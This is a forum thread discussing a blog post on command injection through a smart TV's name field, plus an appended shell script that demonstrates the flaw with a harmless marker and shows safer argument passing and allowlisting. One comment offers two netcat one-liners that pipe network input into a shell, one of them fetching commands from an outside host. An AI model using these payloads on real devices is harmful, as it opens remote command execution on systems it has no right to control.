Makes me want to test my own TV.
Magnificent. Direct command injection and opening netcat via one of the lesser-used menu options; I'm surprised that that somehow doesn't surprise me.
Well, if I was in a limited situation like that, with only so many characters allowed, my go-to command injection would've been a little different.
nc -l 1234 | sh
or
nc 1.2.3.4 1234 | sh
The blog post really didn't explain why, when he said to sleep 2, it froze for 6 seconds. My best guess is that the system takes whatever is inputted into the "change tv name" box and uses it in 3 different commands.
Why nc was on the tv is beyond me.
nc is a very handy tool. It's probably used for updates.
I know it's handy, but I don't see a use for it on a production model; maybe for diags on RMAs?
Maybe. I was thinking something along the lines of nc'ing an update from the server.
Unfortunately my TV sanitized these inputs so no fun for me.
Most embedded systems usually ship with BusyBox included. nc is part of BusyBox. That's how it usually ends up in there.
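
Added example, not part of the thread or of any TV's firmware: a constructed model of the guess above that one "change tv name" value is reused in three commands, next to a form that passes the name as an argument and allowlists it first. The function names and the three handler labels are hypothetical, and the payload is a harmless marker.

```shell
#!/bin/sh
# Constructed model: one "TV name" value reused by three settings handlers.
# The handler labels and function names are hypothetical, not the TV's firmware.

# Vulnerable pattern: the name is pasted into command text that a shell parses,
# so anything after ';' becomes a command of its own, once per handler.
apply_name_unsafe() {
    for step in hostname upnp banner; do
        sh -c "echo set $step to $1" >/dev/null
    done
}

# Safer pattern: the command text is fixed; the name travels as an argument
# and is only ever expanded inside double quotes, never parsed as code.
apply_name_args() {
    for step in hostname upnp banner; do
        sh -c 'echo "set $1 to $2"' sh "$step" "$1" >/dev/null
    done
}

# Defence in depth: allowlist the characters and cap the length first.
valid_name() {
    case $1 in
        ''|*[!A-Za-z0-9._-]*) return 1 ;;
    esac
    [ "${#1}" -le 32 ]
}

apply_name_safe() {
    valid_name "$1" || return 1
    apply_name_args "$1"
}

# Feed a harmless marker payload to handler function $1 and print how many
# times the marker ran (one line is appended to a temp file per execution).
count_hits() {
    log=$(mktemp)
    "$1" "tv; echo hit >> $log" || true
    wc -l < "$log" | tr -d ' '
    rm -f "$log"
}

echo "unsafe handler ran the payload $(count_hits apply_name_unsafe) times"
echo "argument-passing handler ran it $(count_hits apply_name_args) times"
```

Three executions from the unsafe handler is what a threefold delay would look like if the guess in the thread is right; the argument-passing handler runs the marker zero times even without the allowlist.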